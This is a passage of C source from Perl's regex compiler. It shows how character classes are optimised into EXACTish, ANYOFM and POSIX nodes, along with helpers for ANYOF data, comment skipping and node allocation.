* optimizer join this node with adjacent EXACTish ones.
*
* An EXACTFish node can be generated even if not under /i, and vice
* versa. But care must be taken. An EXACTFish node has to be such
* that it only matches precisely the code points in the class, but we
* want to generate the least restrictive one that does that, to
* increase the odds of being able to join with an adjacent node. For
* example, if the class contains [kK], we have to make it an EXACTFAA
* node to prevent the KELVIN SIGN from matching. Whether we are under
* /i or not is irrelevant in this case. Less obvious is the pattern
* qr/[\x{02BC}]n/i. U+02BC is MODIFIER LETTER APOSTROPHE. That is
* supposed to match the single character U+0149 LATIN SMALL LETTER N
* PRECEDED BY APOSTROPHE. And so even though there is no simple fold
* that includes \X{02BC}, there is a multi-char fold that does, and so
* the node generated for it must be an EXACTFish one. On the other
* hand qr/:/i should generate a plain EXACT node since the colon
* participates in no fold whatsoever, and having it EXACT tells the
* optimizer the target string cannot match unless it has a colon in
* it.
*
* We don't typically generate an EXACTish node if doing so would
* require changing the pattern to UTF-8, as that affects /d and
* otherwise is slower. However, under /i, not changing to UTF-8 can
* miss some potential multi-character folds. We calculate the
* EXACTish node, and then decide if something would be missed if we
* don't upgrade */
if ( ! posixl
&& ! invert
/* Only try if there are no more code points in the class than
* in the max possible fold */
&& partial_cp_count > 0 && partial_cp_count <= MAX_FOLD_FROMS + 1
&& (start[0] < 256 || UTF || FOLD))
{
if (partial_cp_count == 1 && ! upper_latin1_only_utf8_matches)
{
/* We can always make a single code point class into an
* EXACTish node. */
if (LOC) {
/* Here is /l: Use EXACTL, except /li indicates EXACTFL,
* as that means there is a fold not known until runtime so
* shows as only a single code point here. */
op = (FOLD) ? EXACTFL : EXACTL;
}
else if (! FOLD) { /* Not /l and not /i */
op = (start[0] < 256) ? EXACT : EXACT_ONLY8;
}
else if (start[0] < 256) { /* /i, not /l, and the code point is
small */
/* Under /i, it gets a little tricky. A code point that
* doesn't participate in a fold should be an EXACT node.
* We know this one isn't the result of a simple fold, or
* there'd be more than one code point in the list, but it
* could be part of a multi- character fold. In that case
* we better not create an EXACT node, as we would wrongly
* be telling the optimizer that this code point must be in
* the target string, and that is wrong. This is because
* if the sequence around this code point forms a
* multi-char fold, what needs to be in the string could be
* the code point that folds to the sequence.
*
* This handles the case of below-255 code points, as we
* have an easy look up for those. The next clause handles
* the above-256 one */
op = IS_IN_SOME_FOLD_L1(start[0])
? EXACTFU
: EXACT;
}
else { /* /i, larger code point. Since we are under /i, and
have just this code point, we know that it can't
fold to something else, so PL_InMultiCharFold
applies to it */
op = _invlist_contains_cp(PL_InMultiCharFold,
start[0])
? EXACTFU_ONLY8
: EXACT_ONLY8;
}
value = start[0];
}
else if ( ! (has_runtime_dependency & ~HAS_D_RUNTIME_DEPENDENCY)
&& _invlist_contains_cp(PL_in_some_fold, start[0]))
{
/* Here, the only runtime dependency, if any, is from /d, and
* the class matches more than one code point, and the lowest
* code point participates in some fold. It might be that the
* other code points are /i equivalent to this one, and hence
* they would representable by an EXACTFish node. Above, we
* eliminated classes that contain too many code points to be
* EXACTFish, with the test for MAX_FOLD_FROMS
*
* First, special case the ASCII fold pairs, like 'B' and 'b'.
* We do this because we have EXACTFAA at our disposal for the
* ASCII range */
if (partial_cp_count == 2 && isASCII(start[0])) {
/* The only ASCII characters that participate in folds are
* alphabetics */
assert(isALPHA(start[0]));
if ( end[0] == start[0] /* First range is a single
character, so 2nd exists */
&& isALPHA_FOLD_EQ(start[0], start[1]))
{
/* Here, is part of an ASCII fold pair */
if ( ASCII_FOLD_RESTRICTED
|| HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(start[0]))
{
/* If the second clause just above was true, it
* means we can't be under /i, or else the list
* would have included more than this fold pair.
* Therefore we have to exclude the possibility of
* whatever else it is that folds to these, by
* using EXACTFAA */
op = EXACTFAA;
}
else if (HAS_NONLATIN1_FOLD_CLOSURE(start[0])) {
/* Here, there's no simple fold that start[0] is part
* of, but there is a multi-character one. If we
* are not under /i, we want to exclude that
* possibility; if under /i, we want to include it
* */
op = (FOLD) ? EXACTFU : EXACTFAA;
}
else {
/* Here, the only possible fold start[0] particpates in
* is with start[1]. /i or not isn't relevant */
op = EXACTFU;
}
value = toFOLD(start[0]);
}
}
else if ( ! upper_latin1_only_utf8_matches
|| ( _invlist_len(upper_latin1_only_utf8_matches)
== 2
&& PL_fold_latin1[
invlist_highest(upper_latin1_only_utf8_matches)]
== start[0]))
{
/* Here, the smallest character is non-ascii or there are
* more than 2 code points matched by this node. Also, we
* either don't have /d UTF-8 dependent matches, or if we
* do, they look like they could be a single character that
* is the fold of the lowest one in the always-match list.
* This test quickly excludes most of the false positives
* when there are /d UTF-8 depdendent matches. These are
* like LATIN CAPITAL LETTER A WITH GRAVE matching LATIN
* SMALL LETTER A WITH GRAVE iff the target string is
* UTF-8. (We don't have to worry above about exceeding
* the array bounds of PL_fold_latin1[] because any code
* point in 'upper_latin1_only_utf8_matches' is below 256.)
*
* EXACTFAA would apply only to pairs (hence exactly 2 code
* points) in the ASCII range, so we can't use it here to
* artificially restrict the fold domain, so we check if
* the class does or does not match some EXACTFish node.
* Further, if we aren't under /i, and and the folded-to
* character is part of a multi-character fold, we can't do
* this optimization, as the sequence around it could be
* that multi-character fold, and we don't here know the
* context, so we have to assume it is that multi-char
* fold, to prevent potential bugs.
*
* To do the general case, we first find the fold of the
* lowest code point (which may be higher than the lowest
* one), then find everything that folds to it. (The data
* structure we have only maps from the folded code points,
* so we have to do the earlier step.) */
Size_t foldlen;
U8 foldbuf[UTF8_MAXBYTES_CASE];
UV folded = _to_uni_fold_flags(start[0],
foldbuf, &foldlen, 0);
unsigned int first_fold;
const unsigned int * remaining_folds;
Size_t folds_to_this_cp_count = _inverse_folds(
folded,
&first_fold,
&remaining_folds);
Size_t folds_count = folds_to_this_cp_count + 1;
SV * fold_list = _new_invlist(folds_count);
unsigned int i;
/* If there are UTF-8 dependent matches, create a temporary
* list of what this node matches, including them. */
SV * all_cp_list = NULL;
SV ** use_this_list = &cp_list;
if (upper_latin1_only_utf8_matches) {
all_cp_list = _new_invlist(0);
use_this_list = &all_cp_list;
_invlist_union(cp_list,
upper_latin1_only_utf8_matches,
use_this_list);
}
/* Having gotten everything that participates in the fold
* containing the lowest code point, we turn that into an
* inversion list, making sure everything is included. */
fold_list = add_cp_to_invlist(fold_list, start[0]);
fold_list = add_cp_to_invlist(fold_list, folded);
if (folds_to_this_cp_count > 0) {
fold_list = add_cp_to_invlist(fold_list, first_fold);
for (i = 0; i + 1 < folds_to_this_cp_count; i++) {
fold_list = add_cp_to_invlist(fold_list,
remaining_folds[i]);
}
}
/* If the fold list is identical to what's in this ANYOF
* node, the node can be represented by an EXACTFish one
* instead */
if (_invlistEQ(*use_this_list, fold_list,
0 /* Don't complement */ )
) {
/* But, we have to be careful, as mentioned above.
* Just the right sequence of characters could match
* this if it is part of a multi-character fold. That
* IS what we want if we are under /i. But it ISN'T
* what we want if not under /i, as it could match when
* it shouldn't. So, when we aren't under /i and this
* character participates in a multi-char fold, we
* don't optimize into an EXACTFish node. So, for each
* case below we have to check if we are folding
* and if not, if it is not part of a multi-char fold.
* */
if (start[0] > 255) { /* Highish code point */
if (FOLD || ! _invlist_contains_cp(
PL_InMultiCharFold, folded))
{
op = (LOC)
? EXACTFLU8
: (ASCII_FOLD_RESTRICTED)
? EXACTFAA
: EXACTFU_ONLY8;
value = folded;
}
} /* Below, the lowest code point < 256 */
else if ( FOLD
&& folded == 's'
&& DEPENDS_SEMANTICS)
{ /* An EXACTF node containing a single character
's', can be an EXACTFU if it doesn't get
joined with an adjacent 's' */
op = EXACTFU_S_EDGE;
value = folded;
}
else if ( FOLD
|| ! HAS_NONLATIN1_FOLD_CLOSURE(start[0]))
{
if (upper_latin1_only_utf8_matches) {
op = EXACTF;
/* We can't use the fold, as that only matches
* under UTF-8 */
value = start[0];
}
else if ( UNLIKELY(start[0] == MICRO_SIGN)
&& ! UTF)
{ /* EXACTFUP is a special node for this
character */
op = (ASCII_FOLD_RESTRICTED)
? EXACTFAA
: EXACTFUP;
value = MICRO_SIGN;
}
else if ( ASCII_FOLD_RESTRICTED
&& ! isASCII(start[0]))
{ /* For ASCII under /iaa, we can use EXACTFU
below */
op = EXACTFAA;
value = folded;
}
else {
op = EXACTFU;
value = folded;
}
}
}
SvREFCNT_dec_NN(fold_list);
SvREFCNT_dec(all_cp_list);
}
}
if (op != END) {
/* Here, we have calculated what EXACTish node we would use.
* But we don't use it if it would require converting the
* pattern to UTF-8, unless not using it could cause us to miss
* some folds (hence be buggy) */
if (! UTF && value > 255) {
SV * in_multis = NULL;
assert(FOLD);
/* If there is no code point that is part of a multi-char
* fold, then there aren't any matches, so we don't do this
* optimization. Otherwise, it could match depending on
* the context around us, so we do upgrade */
_invlist_intersection(PL_InMultiCharFold, cp_list, &in_multis);
if (UNLIKELY(_invlist_len(in_multis) != 0)) {
REQUIRE_UTF8(flagp);
}
else {
op = END;
}
}
if (op != END) {
U8 len = (UTF) ? UVCHR_SKIP(value) : 1;
ret = regnode_guts(pRExC_state, op, len, "exact");
FILL_NODE(ret, op);
RExC_emit += 1 + STR_SZ(len);
STR_LEN(REGNODE_p(ret)) = len;
if (len == 1) {
*STRING(REGNODE_p(ret)) = (U8) value;
}
else {
uvchr_to_utf8((U8 *) STRING(REGNODE_p(ret)), value);
}
goto not_anyof;
}
}
}
if (! has_runtime_dependency) {
/* See if this can be turned into an ANYOFM node. Think about the
* bit patterns in two different bytes. In some positions, the
* bits in each will be 1; and in other positions both will be 0;
* and in some positions the bit will be 1 in one byte, and 0 in
* the other. Let 'n' be the number of positions where the bits
* differ. We create a mask which has exactly 'n' 0 bits, each in
* a position where the two bytes differ. Now take the set of all
* bytes that when ANDed with the mask yield the same result. That
* set has 2**n elements, and is representable by just two 8 bit
* numbers: the result and the mask. Importantly, matching the set
* can be vectorized by creating a word full of the result bytes,
* and a word full of the mask bytes, yielding a significant speed
* up. Here, see if this node matches such a set. As a concrete
* example consider [01], and the byte representing '0' which is
* 0x30 on ASCII machines. It has the bits 0011 0000. Take the
* mask 1111 1110. If we AND 0x31 and 0x30 with that mask we get
* 0x30. Any other bytes ANDed yield something else. So [01],
* which is a common usage, is optimizable into ANYOFM, and can
* benefit from the speed up. We can only do this on UTF-8
* invariant bytes, because they have the same bit patterns under
* UTF-8 as not. */
PERL_UINT_FAST8_T inverted = 0;
#ifdef EBCDIC
const PERL_UINT_FAST8_T max_permissible = 0xFF;
#else
const PERL_UINT_FAST8_T max_permissible = 0x7F;
#endif
/* If doesn't fit the criteria for ANYOFM, invert and try again.
* If that works we will instead later generate an NANYOFM, and
* invert back when through */
if (invlist_highest(cp_list) > max_permissible) {
_invlist_invert(cp_list);
inverted = 1;
}
if (invlist_highest(cp_list) <= max_permissible) {
UV this_start, this_end;
UV lowest_cp = UV_MAX; /* inited to suppress compiler warn */
U8 bits_differing = 0;
Size_t full_cp_count = 0;
bool first_time = TRUE;
/* Go through the bytes and find the bit positions that differ
* */
invlist_iterinit(cp_list);
while (invlist_iternext(cp_list, &this_start, &this_end)) {
unsigned int i = this_start;
if (first_time) {
if (! UVCHR_IS_INVARIANT(i)) {
goto done_anyofm;
}
first_time = FALSE;
lowest_cp = this_start;
/* We have set up the code point to compare with.
* Don't compare it with itself */
i++;
}
/* Find the bit positions that differ from the lowest code
* point in the node. Keep track of all such positions by
* OR'ing */
for (; i <= this_end; i++) {
if (! UVCHR_IS_INVARIANT(i)) {
goto done_anyofm;
}
bits_differing |= i ^ lowest_cp;
}
full_cp_count += this_end - this_start + 1;
}
invlist_iterfinish(cp_list);
/* At the end of the loop, we count how many bits differ from
* the bits in lowest code point, call the count 'd'. If the
* set we found contains 2**d elements, it is the closure of
* all code points that differ only in those bit positions. To
* convince yourself of that, first note that the number in the
* closure must be a power of 2, which we test for. The only
* way we could have that count and it be some differing set,
* is if we got some code points that don't differ from the
* lowest code point in any position, but do differ from each
* other in some other position. That means one code point has
* a 1 in that position, and another has a 0. But that would
* mean that one of them differs from the lowest code point in
* that position, which possibility we've already excluded. */
if ( (inverted || full_cp_count > 1)
&& full_cp_count == 1U << PL_bitcount[bits_differing])
{
U8 ANYOFM_mask;
op = ANYOFM + inverted;;
/* We need to make the bits that differ be 0's */
ANYOFM_mask = ~ bits_differing; /* This goes into FLAGS */
/* The argument is the lowest code point */
ret = reganode(pRExC_state, op, lowest_cp);
FLAGS(REGNODE_p(ret)) = ANYOFM_mask;
}
}
done_anyofm:
if (inverted) {
_invlist_invert(cp_list);
}
if (op != END) {
goto not_anyof;
}
}
if (! (anyof_flags & ANYOF_LOCALE_FLAGS)) {
PERL_UINT_FAST8_T type;
SV * intersection = NULL;
SV* d_invlist = NULL;
/* See if this matches any of the POSIX classes. The POSIXA and
* POSIXD ones are about the same speed as ANYOF ops, but take less
* room; the ones that have above-Latin1 code point matches are
* somewhat faster than ANYOF. */
for (type = POSIXA; type >= POSIXD; type--) {
int posix_class;
if (type == POSIXL) { /* But not /l posix classes */
continue;
}
for (posix_class = 0;
posix_class <= _HIGHEST_REGCOMP_DOT_H_SYNC;
posix_class++)
{
SV** our_code_points = &cp_list;
SV** official_code_points;
int try_inverted;
if (type == POSIXA) {
official_code_points = &PL_Posix_ptrs[posix_class];
}
else {
official_code_points = &PL_XPosix_ptrs[posix_class];
}
/* Skip non-existent classes of this type. e.g. \v only
* has an entry in PL_XPosix_ptrs */
if (! *official_code_points) {
continue;
}
/* Try both the regular class, and its inversion */
for (try_inverted = 0; try_inverted < 2; try_inverted++) {
bool this_inverted = invert ^ try_inverted;
if (type != POSIXD) {
/* This class that isn't /d can't match if we have
* /d dependencies */
if (has_runtime_dependency
& HAS_D_RUNTIME_DEPENDENCY)
{
continue;
}
}
else /* is /d */ if (! this_inverted) {
/* /d classes don't match anything non-ASCII below
* 256 unconditionally (which cp_list contains) */
_invlist_intersection(cp_list, PL_UpperLatin1,
&intersection);
if (_invlist_len(intersection) != 0) {
continue;
}
SvREFCNT_dec(d_invlist);
d_invlist = invlist_clone(cp_list, NULL);
/* But under UTF-8 it turns into using /u rules.
* Add the things it matches under these conditions
* so that we check below that these are identical
* to what the tested class should match */
if (upper_latin1_only_utf8_matches) {
_invlist_union(
d_invlist,
upper_latin1_only_utf8_matches,
&d_invlist);
}
our_code_points = &d_invlist;
}
else { /* POSIXD, inverted. If this doesn't have this
flag set, it isn't /d. */
if (! (anyof_flags & ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER))
{
continue;
}
our_code_points = &cp_list;
}
/* Here, have weeded out some things. We want to see
* if the list of characters this node contains
* ('*our_code_points') precisely matches those of the
* class we are currently checking against
* ('*official_code_points'). */
if (_invlistEQ(*our_code_points,
*official_code_points,
try_inverted))
{
/* Here, they precisely match. Optimize this ANYOF
* node into its equivalent POSIX one of the
* correct type, possibly inverted */
ret = reg_node(pRExC_state, (try_inverted)
? type + NPOSIXA
- POSIXA
: type);
FLAGS(REGNODE_p(ret)) = posix_class;
SvREFCNT_dec(d_invlist);
SvREFCNT_dec(intersection);
goto not_anyof;
}
}
}
}
SvREFCNT_dec(d_invlist);
SvREFCNT_dec(intersection);
}
/* If didn't find an optimization and there is no need for a
* bitmap, optimize to indicate that */
if ( start[0] >= NUM_ANYOF_CODE_POINTS
&& ! LOC
&& ! upper_latin1_only_utf8_matches
&& anyof_flags == 0)
{
UV highest_cp = invlist_highest(cp_list);
/* If the lowest and highest code point in the class have the same
* UTF-8 first byte, then all do, and we can store that byte for
* regexec.c to use so that it can more quickly scan the target
* string for potential matches for this class. We co-opt the the
* flags field for this. Zero means, they don't have the same
* first byte. We do accept here very large code points (for
* future use), but don't bother with this optimization for them,
* as it would cause other complications */
if (highest_cp > IV_MAX) {
anyof_flags = 0;
}
else {
U8 low_utf8[UTF8_MAXBYTES+1];
U8 high_utf8[UTF8_MAXBYTES+1];
(void) uvchr_to_utf8(low_utf8, start[0]);
(void) uvchr_to_utf8(high_utf8, invlist_highest(cp_list));
anyof_flags = (low_utf8[0] == high_utf8[0])
? low_utf8[0]
: 0;
}
op = ANYOFH;
}
} /* End of seeing if can optimize it into a different node */
is_anyof: /* It's going to be an ANYOF node. */
if (op != ANYOFH) {
op = (has_runtime_dependency & HAS_D_RUNTIME_DEPENDENCY)
? ANYOFD
: ((posixl)
? ANYOFPOSIXL
: ((LOC)
? ANYOFL
: ANYOF));
}
ret = regnode_guts(pRExC_state, op, regarglen[op], "anyof");
FILL_NODE(ret, op); /* We set the argument later */
RExC_emit += 1 + regarglen[op];
ANYOF_FLAGS(REGNODE_p(ret)) = anyof_flags;
/* Here, <cp_list> contains all the code points we can determine at
* compile time that match under all conditions. Go through it, and
* for things that belong in the bitmap, put them there, and delete from
* <cp_list>. While we are at it, see if everything above 255 is in the
* list, and if so, set a flag to speed up execution */
populate_ANYOF_from_invlist(REGNODE_p(ret), &cp_list);
if (posixl) {
ANYOF_POSIXL_SET_TO_BITMAP(REGNODE_p(ret), posixl);
}
if (invert) {
ANYOF_FLAGS(REGNODE_p(ret)) |= ANYOF_INVERT;
}
/* Here, the bitmap has been populated with all the Latin1 code points that
* always match. Can now add to the overall list those that match only
* when the target string is UTF-8 (<upper_latin1_only_utf8_matches>).
* */
if (upper_latin1_only_utf8_matches) {
if (cp_list) {
_invlist_union(cp_list,
upper_latin1_only_utf8_matches,
&cp_list);
SvREFCNT_dec_NN(upper_latin1_only_utf8_matches);
}
else {
cp_list = upper_latin1_only_utf8_matches;
}
ANYOF_FLAGS(REGNODE_p(ret)) |= ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP;
}
set_ANYOF_arg(pRExC_state, REGNODE_p(ret), cp_list,
(HAS_NONLOCALE_RUNTIME_PROPERTY_DEFINITION)
? listsv : NULL,
only_utf8_locale_list);
return ret;
not_anyof:
/* Here, the node is getting optimized into something that's not an ANYOF
* one. Finish up. */
Set_Node_Offset_Length(REGNODE_p(ret), orig_parse - RExC_start,
RExC_parse - orig_parse);;
SvREFCNT_dec(cp_list);;
return ret;
}
#undef HAS_NONLOCALE_RUNTIME_PROPERTY_DEFINITION
STATIC void
S_set_ANYOF_arg(pTHX_ RExC_state_t* const pRExC_state,
regnode* const node,
SV* const cp_list,
SV* const runtime_defns,
SV* const only_utf8_locale_list)
{
/* Sets the arg field of an ANYOF-type node 'node', using information about
* the node passed-in. If there is nothing outside the node's bitmap, the
* arg is set to ANYOF_ONLY_HAS_BITMAP. Otherwise, it sets the argument to
* the count returned by add_data(), having allocated and stored an array,
* av, as follows:
*
* av[0] stores the inversion list defining this class as far as known at
* this time, or PL_sv_undef if nothing definite is now known.
* av[1] stores the inversion list of code points that match only if the
* current locale is UTF-8, or if none, PL_sv_undef if there is an
* av[2], or no entry otherwise.
* av[2] stores the list of user-defined properties whose subroutine
* definitions aren't known at this time, or no entry if none. */
UV n;
PERL_ARGS_ASSERT_SET_ANYOF_ARG;
if (! cp_list && ! runtime_defns && ! only_utf8_locale_list) {
assert(! (ANYOF_FLAGS(node)
& ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP));
ARG_SET(node, ANYOF_ONLY_HAS_BITMAP);
}
else {
AV * const av = newAV();
SV *rv;
if (cp_list) {
av_store(av, INVLIST_INDEX, cp_list);
}
if (only_utf8_locale_list) {
av_store(av, ONLY_LOCALE_MATCHES_INDEX, only_utf8_locale_list);
}
if (runtime_defns) {
av_store(av, DEFERRED_USER_DEFINED_INDEX, SvREFCNT_inc(runtime_defns));
}
rv = newRV_noinc(MUTABLE_SV(av));
n = add_data(pRExC_state, STR_WITH_LEN("s"));
RExC_rxi->data->data[n] = (void*)rv;
ARG_SET(node, n);
}
}
#if !defined(PERL_IN_XSUB_RE) || defined(PLUGGABLE_RE_EXTENSION)
SV *
Perl__get_regclass_nonbitmap_data(pTHX_ const regexp *prog,
const regnode* node,
bool doinit,
SV** listsvp,
SV** only_utf8_locale_ptr,
SV** output_invlist)
{
/* For internal core use only.
* Returns the inversion list for the input 'node' in the regex 'prog'.
* If <doinit> is 'true', will attempt to create the inversion list if not
* already done.
* If <listsvp> is non-null, will return the printable contents of the
* property definition. This can be used to get debugging information
* even before the inversion list exists, by calling this function with
* 'doinit' set to false, in which case the components that will be used
* to eventually create the inversion list are returned (in a printable
* form).
* If <only_utf8_locale_ptr> is not NULL, it is where this routine is to
* store an inversion list of code points that should match only if the
* execution-time locale is a UTF-8 one.
* If <output_invlist> is not NULL, it is where this routine is to store an
* inversion list of the code points that would be instead returned in
* <listsvp> if this were NULL. Thus, what gets output in <listsvp>
* when this parameter is used, is just the non-code point data that
* will go into creating the inversion list. This currently should be just
* user-defined properties whose definitions were not known at compile
* time. Using this parameter allows for easier manipulation of the
* inversion list's data by the caller. It is illegal to call this
* function with this parameter set, but not <listsvp>
*
* Tied intimately to how S_set_ANYOF_arg sets up the data structure. Note
* that, in spite of this function's name, the inversion list it returns
* may include the bitmap data as well */
SV *si = NULL; /* Input initialization string */
SV* invlist = NULL;
RXi_GET_DECL(prog, progi);
const struct reg_data * const data = prog ? progi->data : NULL;
PERL_ARGS_ASSERT__GET_REGCLASS_NONBITMAP_DATA;
assert(! output_invlist || listsvp);
if (data && data->count) {
const U32 n = ARG(node);
if (data->what[n] == 's') {
SV * const rv = MUTABLE_SV(data->data[n]);
AV * const av = MUTABLE_AV(SvRV(rv));
SV **const ary = AvARRAY(av);
invlist = ary[INVLIST_INDEX];
if (av_tindex_skip_len_mg(av) >= ONLY_LOCALE_MATCHES_INDEX) {
*only_utf8_locale_ptr = ary[ONLY_LOCALE_MATCHES_INDEX];
}
if (av_tindex_skip_len_mg(av) >= DEFERRED_USER_DEFINED_INDEX) {
si = ary[DEFERRED_USER_DEFINED_INDEX];
}
if (doinit && (si || invlist)) {
if (si) {
bool user_defined;
SV * msg = newSVpvs_flags("", SVs_TEMP);
SV * prop_definition = handle_user_defined_property(
"", 0, FALSE, /* There is no \p{}, \P{} */
SvPVX_const(si)[1] - '0', /* /i or not has been
stored here for just
this occasion */
TRUE, /* run time */
FALSE, /* This call must find the defn */
si, /* The property definition */
&user_defined,
msg,
0 /* base level call */
);
if (SvCUR(msg)) {
assert(prop_definition == NULL);
Perl_croak(aTHX_ "%" UTF8f,
UTF8fARG(SvUTF8(msg), SvCUR(msg), SvPVX(msg)));
}
if (invlist) {
_invlist_union(invlist, prop_definition, &invlist);
SvREFCNT_dec_NN(prop_definition);
}
else {
invlist = prop_definition;
}
STATIC_ASSERT_STMT(ONLY_LOCALE_MATCHES_INDEX == 1 + INVLIST_INDEX);
STATIC_ASSERT_STMT(DEFERRED_USER_DEFINED_INDEX == 1 + ONLY_LOCALE_MATCHES_INDEX);
av_store(av, INVLIST_INDEX, invlist);
av_fill(av, (ary[ONLY_LOCALE_MATCHES_INDEX])
? ONLY_LOCALE_MATCHES_INDEX:
INVLIST_INDEX);
si = NULL;
}
}
}
}
/* If requested, return a printable version of what this ANYOF node matches
* */
if (listsvp) {
SV* matches_string = NULL;
/* This function can be called at compile-time, before everything gets
* resolved, in which case we return the currently best available
* information, which is the string that will eventually be used to do
* that resolving, 'si' */
if (si) {
/* Here, we only have 'si' (and possibly some passed-in data in
* 'invlist', which is handled below) If the caller only wants
* 'si', use that. */
if (! output_invlist) {
matches_string = newSVsv(si);
}
else {
/* But if the caller wants an inversion list of the node, we
* need to parse 'si' and place as much as possible in the
* desired output inversion list, making 'matches_string' only
* contain the currently unresolvable things */
const char *si_string = SvPVX(si);
STRLEN remaining = SvCUR(si);
UV prev_cp = 0;
U8 count = 0;
/* Ignore everything before the first new-line */
while (*si_string != '\n' && remaining > 0) {
si_string++;
remaining--;
}
assert(remaining > 0);
si_string++;
remaining--;
while (remaining > 0) {
/* The data consists of just strings defining user-defined
* property names, but in prior incarnations, and perhaps
* somehow from pluggable regex engines, it could still
* hold hex code point definitions. Each component of a
* range would be separated by a tab, and each range by a
* new-line. If these are found, instead add them to the
* inversion list */
I32 grok_flags = PERL_SCAN_SILENT_ILLDIGIT
|PERL_SCAN_SILENT_NON_PORTABLE;
STRLEN len = remaining;
UV cp = grok_hex(si_string, &len, &grok_flags, NULL);
/* If the hex decode routine found something, it should go
* up to the next \n */
if ( *(si_string + len) == '\n') {
if (count) { /* 2nd code point on line */
*output_invlist = _add_range_to_invlist(*output_invlist, prev_cp, cp);
}
else {
*output_invlist = add_cp_to_invlist(*output_invlist, cp);
}
count = 0;
goto prepare_for_next_iteration;
}
/* If the hex decode was instead for the lower range limit,
* save it, and go parse the upper range limit */
if (*(si_string + len) == '\t') {
assert(count == 0);
prev_cp = cp;
count = 1;
prepare_for_next_iteration:
si_string += len + 1;
remaining -= len + 1;
continue;
}
/* Here, didn't find a legal hex number. Just add it from
* here to the next \n */
remaining -= len;
while (*(si_string + len) != '\n' && remaining > 0) {
remaining--;
len++;
}
if (*(si_string + len) == '\n') {
len++;
remaining--;
}
if (matches_string) {
sv_catpvn(matches_string, si_string, len - 1);
}
else {
matches_string = newSVpvn(si_string, len - 1);
}
si_string += len;
sv_catpvs(matches_string, " ");
} /* end of loop through the text */
assert(matches_string);
if (SvCUR(matches_string)) { /* Get rid of trailing blank */
SvCUR_set(matches_string, SvCUR(matches_string) - 1);
}
} /* end of has an 'si' */
}
/* Add the stuff that's already known */
if (invlist) {
/* Again, if the caller doesn't want the output inversion list, put
* everything in 'matches-string' */
if (! output_invlist) {
if ( ! matches_string) {
matches_string = newSVpvs("\n");
}
sv_catsv(matches_string, invlist_contents(invlist,
TRUE /* traditional style */
));
}
else if (! *output_invlist) {
*output_invlist = invlist_clone(invlist, NULL);
}
else {
_invlist_union(*output_invlist, invlist, output_invlist);
}
}
*listsvp = matches_string;
}
return invlist;
}
#endif /* !defined(PERL_IN_XSUB_RE) || defined(PLUGGABLE_RE_EXTENSION) */
/* reg_skipcomment()
Absorbs an /x style # comment from the input stream,
returning a pointer to the first character beyond the comment, or if the
comment terminates the pattern without anything following it, this returns
one past the final character of the pattern (in other words, RExC_end) and
sets the REG_RUN_ON_COMMENT_SEEN flag.
Note it's the callers responsibility to ensure that we are
actually in /x mode
*/
PERL_STATIC_INLINE char*
S_reg_skipcomment(RExC_state_t *pRExC_state, char* p)
{
PERL_ARGS_ASSERT_REG_SKIPCOMMENT;
assert(*p == '#');
while (p < RExC_end) {
if (*(++p) == '\n') {
return p+1;
}
}
/* we ran off the end of the pattern without ending the comment, so we have
* to add an \n when wrapping */
RExC_seen |= REG_RUN_ON_COMMENT_SEEN;
return p;
}
STATIC void
S_skip_to_be_ignored_text(pTHX_ RExC_state_t *pRExC_state,
char ** p,
const bool force_to_xmod
)
{
/* If the text at the current parse position '*p' is a '(?#...)' comment,
* or if we are under /x or 'force_to_xmod' is TRUE, and the text at '*p'
* is /x whitespace, advance '*p' so that on exit it points to the first
* byte past all such white space and comments */
const bool use_xmod = force_to_xmod || (RExC_flags & RXf_PMf_EXTENDED);
PERL_ARGS_ASSERT_SKIP_TO_BE_IGNORED_TEXT;
assert( ! UTF || UTF8_IS_INVARIANT(**p) || UTF8_IS_START(**p));
for (;;) {
if (RExC_end - (*p) >= 3
&& *(*p) == '('
&& *(*p + 1) == '?'
&& *(*p + 2) == '#')
{
while (*(*p) != ')') {
if ((*p) == RExC_end)
FAIL("Sequence (?#... not terminated");
(*p)++;
}
(*p)++;
continue;
}
if (use_xmod) {
const char * save_p = *p;
while ((*p) < RExC_end) {
STRLEN len;
if ((len = is_PATWS_safe((*p), RExC_end, UTF))) {
(*p) += len;
}
else if (*(*p) == '#') {
(*p) = reg_skipcomment(pRExC_state, (*p));
}
else {
break;
}
}
if (*p != save_p) {
continue;
}
}
break;
}
return;
}
/* nextchar()
Advances the parse position by one byte, unless that byte is the beginning
of a '(?#...)' style comment, or is /x whitespace and /x is in effect. In
those two cases, the parse position is advanced beyond all such comments and
white space.
This is the UTF, (?#...), and /x friendly way of saying RExC_parse++.
*/
STATIC void
S_nextchar(pTHX_ RExC_state_t *pRExC_state)
{
PERL_ARGS_ASSERT_NEXTCHAR;
if (RExC_parse < RExC_end) {
assert( ! UTF
|| UTF8_IS_INVARIANT(*RExC_parse)
|| UTF8_IS_START(*RExC_parse));
RExC_parse += (UTF)
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
FALSE /* Don't force /x */ );
}
}
STATIC void
S_change_engine_size(pTHX_ RExC_state_t *pRExC_state, const Ptrdiff_t size)
{
/* 'size' is the delta to add or subtract from the current memory allocated
* to the regex engine being constructed */
PERL_ARGS_ASSERT_CHANGE_ENGINE_SIZE;
RExC_size += size;
Renewc(RExC_rxi,
sizeof(regexp_internal) + (RExC_size + 1) * sizeof(regnode),
/* +1 for REG_MAGIC */
char,
regexp_internal);
if ( RExC_rxi == NULL )
FAIL("Regexp out of space");
RXi_SET(RExC_rx, RExC_rxi);
RExC_emit_start = RExC_rxi->program;
if (size > 0) {
Zero(REGNODE_p(RExC_emit), size, regnode);
}
#ifdef RE_TRACK_PATTERN_OFFSETS
Renew(RExC_offsets, 2*RExC_size+1, U32);
if (size > 0) {
Zero(RExC_offsets + 2*(RExC_size - size) + 1, 2 * size, U32);
}
RExC_offsets[0] = RExC_size;
#endif
}
STATIC regnode_offset
S_regnode_guts(pTHX_ RExC_state_t *pRExC_state, const U8 op, const STRLEN extra_size, const char* const name)
{
/* Allocate a regnode for 'op', with 'extra_size' extra space. It aligns
* and increments RExC_size and RExC_emit
*
* It returns the regnode's offset into the regex engine program */
const regnode_offset ret = RExC_emit;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGNODE_GUTS;
SIZE_ALIGN(RExC_size);
